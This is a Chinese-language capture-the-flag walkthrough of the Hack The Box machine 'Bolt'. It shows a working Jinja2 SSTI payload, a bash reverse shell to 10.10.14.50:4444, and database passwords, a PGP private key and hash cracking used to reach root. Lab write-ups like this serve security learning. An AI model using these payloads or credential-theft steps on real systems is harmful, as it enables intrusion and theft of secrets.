`─# nmap 10.10.11.114 -p- -sC -sV --min-rate=2000``Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 EST``Nmap scan report for 10.10.11.114``Host is up (0.31s latency).``Not shown: 65532 closed tcp ports (reset)``PORT STATE SERVICE VERSION``22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)``| ssh-hostkey:` `| 3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)``| 256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)``|_ 256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)``80/tcp open http nginx 1.18.0 (Ubuntu)``|_http-title: Starter Website - About` `|_http-server-header: nginx/1.18.0 (Ubuntu)``443/tcp open ssl/http nginx 1.18.0 (Ubuntu)``| http-title: Passbolt | Open source password manager for teams``|_Requested resource was /auth/login?redirect=%2F``| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU``| Not valid before: 2021-02-24T19:11:23``|_Not valid after: 2022-02-24T19:11:23``|_http-server-header: nginx/1.18.0 (Ubuntu)``|_ssl-date: TLS randomness does not represent time``Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel`` ``Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .``Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds`` `
访问网站又一个登录口,还可以创建账户。走一个。不行。有报错
打开后发现是几个虚拟机镜像,有一些信息泄露
─\# cat repositories
{"flask-dashboard-adminlte\_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}
这里说,最后一个版本是 xxx。进入目录app/base/__pycache__
下发现两个pyc文件。反编译后代码如下:
pip3 install uncompyle6 \-i https://pypi.tuna.tsinghua.edu.cn/simple/
当作知识点吧。反编译根源码还是差点。下面发现了源码贴了上来
`# -*- encoding: utf-8 -*-``"""``Copyright (c) 2019 - present AppSeed.us``"""`` ``from flask import jsonify, render_template, redirect, request, url_for``from flask_login import (` `current_user,` `login_required,` `login_user,` `logout_user``)`` ``from app import db, login_manager``from app.base import blueprint``from app.base.forms import LoginForm, CreateAccountForm``from app.base.models import User``from hmac import compare_digest as compare_hash``import crypt`` ``@blueprint.route('/')``def route_default():` `return redirect(url_for('base_blueprint.login'))`` ``## Login & Registration`` ``@blueprint.route('/login', methods=['GET', 'POST'])``def login():` `login_form = LoginForm(request.form)` `if 'login' in request.form:` ` # read form data` `username = request.form['username']` `password = request.form['password']`` ` `# Locate user` `user = User.query.filter_by(username=username).first()` ` # Check the password` `stored_password = user.password` `stored_password = stored_password.decode('utf-8')` `if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):`` ` `login_user(user)` `return redirect(url_for('base_blueprint.route_default'))`` ` `# Something (user or pass) is not ok` `return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)`` ` `if not current_user.is_authenticated:` `return render_template( 'accounts/login.html',` `form=login_form)` `return redirect(url_for('home_blueprint.index'))`` ``@blueprint.route('/register', methods=['GET', 'POST'])``def register():` `login_form = LoginForm(request.form)` `create_account_form = CreateAccountForm(request.form)` `if 'register' in request.form:`` ` `username = request.form['username']` `email = request.form['email' ]` `data = User.query.filter_by(email=email).first()` `if data is None:` `# Check usename exists` `user = User.query.filter_by(username=username).first()` `if user:` `return render_template( 'accounts/register.html',`` msg='Username already registered',` `success=False,` `form=create_account_form)`` ` `# Check email exists` `user = User.query.filter_by(email=email).first()` `if user:` `return render_template( 'accounts/register.html',`` msg='Email already registered', `` success=False,` `form=create_account_form)`` ` `# else we can create the user` `user = User(**request.form)` `db.session.add(user)` `db.session.commit()`` ` `return render_template( 'accounts/register.html',`` msg='User created please <a href="/login">login</a>', `` success=True,` `form=create_account_form)`` ` `else:` `return render_template( 'accounts/register.html', form=create_account_form)`` ``@blueprint.route('/logout')``def logout():` `logout_user()` `return redirect(url_for('base_blueprint.login'))`` ``## Errors`` ``@login_manager.unauthorized_handler``def unauthorized_handler():` `return render_template('page-403.html'), 403`` ``@blueprint.errorhandler(403)``def access_forbidden(error):` `return render_template('page-403.html'), 403`` ``@blueprint.errorhandler(404)``def not_found_error(error):` `return render_template('page-404.html'), 404`` ``@blueprint.errorhandler(500)``def internal_error(error):` `return render_template('page-500.html'), 500`` `
`└─# cat forms.py` `# uncompyle6 version 3.8.0``# Python bytecode 3.6 (3379)``# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00)` `# [GCC 10.3.0]``# Embedded file name: /app/base/forms.py``# Compiled at: 2021-03-05 12:48:36``# Size of source mod 2**32: 791 bytes``"""``Copyright (c) 2019 - present AppSeed.us``"""``from flask_wtf import FlaskForm``from wtforms import TextField, PasswordField``from wtforms.validators import InputRequired, Email, DataRequired`` ``class LoginForm(FlaskForm):` `username = TextField('Username', id='username_login', validators=[DataRequired()])` `password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])`` `` ``class CreateAccountForm(FlaskForm):` `username = TextField('Username', id='username_create', validators=[DataRequired()])` `email = TextField('Email', id='email_create', validators=[DataRequired(), Email()])` `password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])``# okay decompiling forms.cpython-36.pyc`
东西太多, 先看哪些重要的
for i in a:
os.system("tar -tvf"+i)
几个特殊的文件列一下:
`a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar``-rw-r--r-- root/root 16384 2021-03-05 12:44 db.sqlite3`` ``2265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar``-rw-r--r-- root/root 791 2021-03-05 12:48 app/base/forms.py``-rw-r--r-- root/root 3778 2021-03-05 12:49 app/base/routes.py``745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar``-rw-r--r-- root/root 142 2021-03-05 06:11 .env``-rw-r--r-- root/root 1448 2021-03-05 09:22 config.py``-rw-r--r-- root/root 198 2021-03-05 06:11 gunicorn-cfg.py``-rw-r--r-- root/root 116 2021-03-05 07:40 requirements.txt``-rw-r--r-- root/root 955 2021-03-05 06:11 run.py`` `
在config.py
文件中有一个sqllite3连接和postfreSQl
数据库的账号密码。
#PostgreSQL database
SQLALCHEMY\_DATABASE\_URI = '{}://{}:{}@{}:{}/{}'.format(
config( 'DB\_ENGINE' , default\='postgresql' ),
config( 'DB\_USERNAME' , default\='appseed' ),
config( 'DB\_PASS' , default\='pass' ),
config( 'DB\_HOST' , default\='localhost' ),
config( 'DB\_PORT' , default\=5432 ),
config( 'DB\_NAME' , default\='appseed-flask' )
)
admin admin@bolt.htb $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
密码密文。通过接口login可以发现接口是这样加密的
`# read form data` `username = request.form['username']` `password = request.form['password']`` ` `# Locate user` `user = User.query.filter_by(username=username).first()` ` # Check the password` `stored_password = user.password` `stored_password = stored_password.decode('utf-8')` `if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):`` ` `login_user(user)` `return redirect(url_for('base_blueprint.route_default'))`` `
根据代码逻辑,关键在于使用username 查询后创建了一个user对象。用户登录的条件是用户存在,且用户密码和用户原始密码(用密文当盐)的加密相比的,竟然能等于原来的值。一脸懵逼。解密出如下密码:
admin/deadbolt
到这里感觉没东西了
扫描一下vhost,找到两个子域名 demo
和mail
。
现在有三个网站了。
demo.bolt.htb#一个登录界面,能够创建用户,需要一个invite code
mail.boot.htb #一个登录界面
passbolt.bolt.htb AdminLTE3
在config.py
中还配置了一个SECRET_KEY
default='S#perS3crEt_007'
。
尝试一下不行
找了好久找到了
'XNSS-HSJW-3NGU-8XTJ'
curl -i -s -k -X $'POST' \\
-H $'Host: demo.bolt.htb' \\
--data-binary $'\\x0d\\x0ausername=123&email=123@qq.com&password=123&invite\_code=XNSS-HSJW-3NGU-8XTJ' \\
$'http://demo.bolt.htb/register'
注册后发现可以登录mail,mail应该是一个邮件服务器。
邮件服务可以登录,发现修改一下配置,会收到一个邮件???因为是pyhon的尝试模版注入。
点击后,发现一个新的邮件,出现了10000,说明name参数处存在SSTI注入漏洞。
{{"".\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_()}}
查看到 popen是223个
{{"".\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_()\[222\]}}
<class 'subprocess.Popen'>
最终调用初始化,发现不行。
{{"".\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_()\[222\].\_\_init\_\_}}
<slot wrapper '\_\_init\_\_' of 'object' objects>
由于使用了模板jinja2
,尝试搜了下payload:
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}`` ``www-data`
0x03 获取权限
同样的方法发送payload:
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}
`└─# nc -lvnp 4444``listening on [any] 4444 ...``connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808``bash: cannot set terminal process group (1012): Inappropriate ioctl for device``bash: no job control in this shell``www-data@bolt:~/demo$ id``id``uid=33(www-data) gid=33(www-data) groups=33(www-data)``www-data@bolt:~/demo$ whoami``whoami``www-data`` `
`www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v false``cat /etc/passwd|grep -v nologin |grep -v false``root:x:0:0:root:/root:/bin/bash``sync:x:4:65534:sync:/bin:/bin/sync``eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash``clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash`
`[-] /etc/init/ config file permissions:``total 24``drwxr-xr-x 2 root root 4096 Sep 9 10:07 .``drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..``-rw-r--r-- 1 root root 1757 Nov 6 2019 mysql.conf``-rw-r--r-- 1 root root 453 Dec 2 2020 whoopsie.conf`
`[-] Any interesting mail in /var/mail:``total 24``drwxrwsr-x 3 root mail 4096 Dec 17 00:27 .``drwxr-xr-x 15 root root 4096 Aug 4 13:06 ..``drwx--S--- 5 5001 mail 4096 Dec 19 08:23 123``-rw------- 1 eddie mail 909 Feb 25 2021 eddie``-rw------- 1 root mail 1 Mar 3 2021 root``-rw------- 1 www-data mail 1 Mar 3 2021 www-data`
没找到什么可利用的点。
根据用户查文件:
`www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/null``find /etc -user www-data 2>/dev/null``/etc/passbolt/Seeds`
/etc/passbolt/Seeds
在passbolt.php
中存在一个passwd: rT2;jW7<eY8!dX8}pQ8%
有如下关键信息:
`return [` `'App' => [` `// A base URL to use for absolute links.` `// The url where the passbolt instance will be reachable to your end users.` `// This information is need to render images in emails for example` `'fullBaseUrl' => 'https://passbolt.bolt.htb',` `],`` ` `// Database configuration.` `'Datasources' => [` `'default' => [` `'host' => 'localhost',` `'port' => '3306',` `'username' => 'passbolt',` `'password' => 'rT2;jW7<eY8!dX8}pQ8%',` `'database' => 'passboltdb',` `],` `],`
数据库连接上,没什么关键信息。
`select * from users;``+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+``| id | role_id | username | active | deleted | created | modified |``+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+``| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | eddie@bolt.htb | 1 | 0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 |``| 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | clark@bolt.htb | 1 | 0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |`
还有一个奇怪的东西
`-----BEGIN PGP MESSAGE-----``Version: OpenPGP.js v4.10.9``Comment: https://openpgpjs.org`` ``wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc``g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY``pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H``oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px``l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R``zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp``edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u``l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt``oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7``FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov``8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey``5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY``NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a``Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs``nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6``TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984``=P38i``-----END PGP MESSAGE-----`` `
OpenPGP是一个加密工具。
比之前多了一个数据库密码。尝试连接切换用户。
其中eddie
用户成功。
在邮件中发现有收到来自Clark的用户的邮件,邮件里提到密码管理系统和私钥备份。邮件如下:
`eddie@bolt:/var/mail$ cat eddie``cat eddie``From clark@bolt.htb Thu Feb 25 14:20:19 2021``Return-Path: <clark@bolt.htb>``X-Original-To: eddie@bolt.htb``Delivered-To: eddie@bolt.htb``Received: by bolt.htb (Postfix, from userid 1001)` `id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)``Subject: Important!``To: <eddie@bolt.htb>``X-Mailer: mail (GNU Mailutils 3.7)``Message-Id: <20210225212019.DFF264CD@bolt.htb>``Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)``From: Clark Griswold <clark@bolt.htb>`` ``Hey Eddie,`` ``The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.``Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...`` ``-Clark`
还发现了一个CVE-2021-22555
github搜了一个不行,回头再看。
还有一个信息。
══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
什么是PGP???
https://gist.github.com/jhjguxin/6037564
如果不熟悉先在本地测试。
`══╣ Possible private SSH keys were found!``/etc/ImageMagick-6/mime.xml``/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js``/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js``/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log`
在文件中找到三个公钥。。。,一个私钥,私钥如下
`-----BEGIN PGP PRIVATE KEY BLOCK-----``Version: OpenPGP.js v4.10.9``Comment: https://openpgpjs.org`` ``xcMGBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi``fjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk``cpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU``RNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU``+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a``If70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB``AAH+CQMINK+e85VtWtjguB8IR+AfuDbIzHyKKvMfGStRhZX5cdsUfv5znicW``UjeGmI+w7iQ+WYFlmjFN/Qd527qOFOZkm6TgDMUVubQFWpeDvhM4F3Y+Fhua``jS8nQauoC87vYCRGXLoCrzvM03IpepDgeKqVV5r71gthcc2C/Rsyqd0BYXXA``iOe++biDBB6v/pMzg0NHUmhmiPnSNfHSbABqaY3WzBMtisuUxOzuvwEIRdac``2eEUhzU4cS8s1QyLnKO8ubvD2D4yVk+ZAxd2rJhhleZDiASDrIDT9/G5FDVj``QY3ep7tx0RTE8k5BE03NrEZi6TTZVa7MrpIDjb7TLzAKxavtZZYOJkhsXaWf``DRe3Gtmo/npea7d7jDG2i1bn9AJfAdU0vkWrNqfAgY/r4j+ld8o0YCP+76K/``7wiZ3YYOBaVNiz6L1DD0B5GlKiAGf94YYdl3rfIiclZYpGYZJ9Zbh3y4rJd2``AZkM+9snQT9azCX/H2kVVryOUmTP+uu+p+e51z3mxxngp7AE0zHqrahugS49``tgkE6vc6G3nG5o50vra3H21kSvv1kUJkGJdtaMTlgMvGC2/dET8jmuKs0eHc``Uct0uWs8LwgrwCFIhuHDzrs2ETEdkRLWEZTfIvs861eD7n1KYbVEiGs4n2OP``yF1ROfZJlwFOw4rFnmW4Qtkq+1AYTMw1SaV9zbP8hyDMOUkSrtkxAHtT2hxj``XTAuhA2i5jQoA4MYkasczBZp88wyQLjTHt7ZZpbXrRUlxNJ3pNMSOr7K/b3e``IHcUU5wuVGzUXERSBROU5dAOcR+lNT+Be+T6aCeqDxQo37k6kY6Tl1+0uvMp``eqO3/sM0cM8nQSN6YpuGmnYmhGAgV/Pj5t+cl2McqnWJ3EsmZTFi37Lyz1CM``vjdUlrpzWDDCwA8VHN1QxSKv4z2+QmXSzR5FZGRpZSBKb2huc29uIDxlZGRp``ZUBib2x0Lmh0Yj7CwI0EEAEIACAFAmA4G2EGCwkHCAMCBBUICgIEFgIBAAIZ``AQIbAwIeAQAhCRAcJ0Gj3DtKvRYhBN9Ca8ekqK9Y5Q7aDhwnQaPcO0q9+Q0H``/R2ThWBN8roNk7hCWO6vUH8Da1oXyR5jsHTNZAileV5wYnN+egxf1Yk9/qXF``nyG1k/IImCGf9qmHwHe+EvoDCgYpvMAQB9Ce1nJ1CPqcv818WqRsQRdLnyba``qx5j2irDWkFQhFd3Q806pVUYtL3zgwpupLdxPH/Bj2CvTIdtYD454aDxNbNt``zc5gVIg7esI2dnTkNnFWoFZ3+j8hzFmS6lJvJ0GN+Nrd/gAOkhU8P2KcDz74``7WQQR3/eQa0m6QhOQY2q/VMgfteMejlHFoZCbu0IMkqwsAINmiiAc7H1qL3F``U3vUZKav7ctbWDpJU/ZJ++Q/bbQxeFPPkM+tZEyAn/fHwwYEYDgbYQEIAJpY``HMNw6lcxAWuZPXYz7FEyVjilWObqMaAael9B/Z40fVH29l7ZsWVFHVf7obW5``zNJUpTZHjTQV+HP0J8vPL35IG+usXKDqOKvnzQhGXwpnEtgMDLFJc2jw0I6M``KeFfplknPCV6uBlznf5q6KIm7YhHbbyuKczHb8BgspBaroMkQy5LHNYXw2FP``rOUeNkzYjHVuzsGAKZZzo4BMTh/H9ZV1ZKm7KuaeeE2x3vtEnZXx+aSX+Bn8``Ko+nUJZEn9wzHhJwcsRGV94pnihqwlJsCzeDRzHlLORF7i57n7rfWkzIW8P7``XrU7VF0xxZP83OxIWQ0dXd5pA1fN3LRFIegbhJcAEQEAAf4JAwizGF9kkXhP``leD/IYg69kTvFfuw7JHkqkQF3cBf3zoSykZzrWNW6Kx2CxFowDd/a3yB4moU``KP9sBvplPPBrSAQmqukQoH1iGmqWhGAckSS/WpaPSEOG3K5lcpt5EneFC64f``a6yNKT1Z649ihWOv+vpOEftJVjOvruyblhl5QMNUPnvGADHdjZ9SRmo+su67``JAKMm0cf1opW9x+CMMbZpK9m3QMyXtKyEkYP5w3EDMYdM83vExb0DvbUEVFH``kERD10SVfII2e43HFgU+wXwYR6cDSNaNFdwbybXQ0quQuUQtUwOH7t/Kz99+``Ja9e91nDa3oLabiqWqKnGPg+ky0oEbTKDQZ7Uy66tugaH3H7tEUXUbizA6cT``Gh4htPq0vh6EJGCPtnyntBdSryYPuwuLI5WrOKT+0eUWkMA5NzJwHbJMVAlB``GquB8QmrJA2QST4v+/xnMLFpKWtPVifHxV4zgaUF1CAQ67OpfK/YSW+nqong``cVwHHy2W6hVdr1U+fXq9XsGkPwoIJiRUC5DnCg1bYJobSJUxqXvRm+3Z1wXO``n0LJKVoiPuZr/C0gDkek/i+p864FeN6oHNxLVLffrhr77f2aMQ4hnSsJYzuz``4sOO1YdK7/88KWj2QwlgDoRhj26sqD8GA/PtvN0lvInYT93YRqa2e9o7gInT``4JoYntujlyG2oZPLZ7tafbSEK4WRHx3YQswkZeEyLAnSP6R2Lo2jptleIV8h``J6V/kusDdyek7yhT1dXVkZZQSeCUUcQXO4ocMQDcj6kDLW58tV/WQKJ3duRt``1VrD5poP49+OynR55rXtzi7skOM+0o2tcqy3JppM3egvYvXlpzXggC5b1NvS``UCUqIkrGQRr7VTk/jwkbFt1zuWp5s8zEGV7aXbNI4cSKDsowGuTFb7cBCDGU``Nsw+14+EGQp5TrvCwHYEGAEIAAkFAmA4G2ECGwwAIQkQHCdBo9w7Sr0WIQTf``QmvHpKivWOUO2g4cJ0Gj3DtKvf4dB/9CGuPrOfIaQtuP25S/RLVDl8XHvzPm``oRdF7iu8ULcA9gTxPn8DNbtdZEnFHHOANAHnIFGgYS4vj3Dj9Q3CEZSSVvwg``6599FMcw9nGzypVOgqgQv8JGmIUeCipD10k8nHW7m9YBfQB04y9wJw99WNw/``Ic3vdhZ6NvsmLzYI21dnWD287sPj2tKAuhI0AqCEkiRwb4Z4CSGgJ5TgGML8``11Izrkqamzpc6mKBGi213tYH6xel3nDJv5TKm3AGwXsAhJjJw+9K0MNARKCm``YZFGLdtA/qMajW4/+T3DJ79YwPQOtCrFyHiWoIOTWfs4UhiUJIE4dTSsT/W0``PSwYYWlAywj5``=cqxZ``-----END PGP PRIVATE KEY BLOCK-----`
在数据库中还有一个pgp message
是需要解密的密文
众所周知,私钥一般有密码,尝试破解私钥的密码
gpg2john
`└─# gpg2john pri.key > tmp 1 ⨯``File pri.key`` ``─# cat tmp` `Eddie Johnson:$gpg$*1*668*2048*2b518595f971db147efe739e2716523786988fb0ee243e5981659a314dfd0779dbba8e14e6649ba4e00cc515b9b4055a9783be133817763e161b9a8d2f2741aba80bceef6024465cba02af3bccd372297a90e078aa95579afbd60b6171cd82fd1b32a9dd016175c088e7bef9b883041eaffe933383434752686688f9d235f1d26c006a698dd6cc132d8acb94c4eceebf010845d69cd9e114873538712f2cd50c8b9ca3bcb9bbc3d83e32564f99031776ac986195e643880483ac80d3f7f1b9143563418ddea7bb71d114c4f24e41134dcdac4662e934d955aeccae92038dbed32f300ac5abed65960e26486c5da59f0d17b71ad9a8fe7a5e6bb77b8c31b68b56e7f4025f01d534be45ab36a7c0818febe23fa577ca346023feefa2bfef0899dd860e05a54d8b3e8bd430f40791a52a20067fde1861d977adf222725658a4661927d65b877cb8ac977601990cfbdb27413f5acc25ff1f691556bc8e5264cffaebbea7e7b9d73de6c719e0a7b004d331eaada86e812e3db60904eaf73a1b79c6e68e74beb6b71f6d644afbf591426418976d68c4e580cbc60b6fdd113f239ae2acd1e1dc51cb74b96b3c2f082bc0214886e1c3cebb3611311d9112d61194df22fb3ceb5783ee7d4a61b544886b389f638fc85d5139f64997014ec38ac59e65b842d92afb50184ccc3549a57dcdb3fc8720cc394912aed931007b53da1c635d302e840da2e6342803831891ab1ccc1669f3cc3240b8d31eded96696d7ad1525c4d277a4d3123abecafdbdde207714539c2e546cd45c4452051394e5d00e711fa5353f817be4fa6827aa0f1428dfb93a918e93975fb4baf3297aa3b7fec33470cf2741237a629b869a762684602057f3e3e6df9c97631caa7589dc4b26653162dfb2f2cf508cbe375496ba735830c2c00f151cdd50c522afe33dbe4265d2*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <eddie@bolt.htb>::pri.key`
`┌──(root💀kali)-[~/tmp]``└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmp``Using default input encoding: UTF-8``Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])``Cost 1 (s2k-count) is 16777216 for all loaded hashes``Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashes``Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes``Will run 4 OpenMP threads``Press 'q' or Ctrl-C to abort, almost any other key for status``merrychristmas (Eddie Johnson)``1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudo``Use the "--show" option to display all of the cracked passwords reliably``Session completed`
解密:
`gpg --batch --import /tmp/pri.key``gpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key`` ``{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}`
切换用户到root,成功获取权限。
喜欢就请关注我们吧!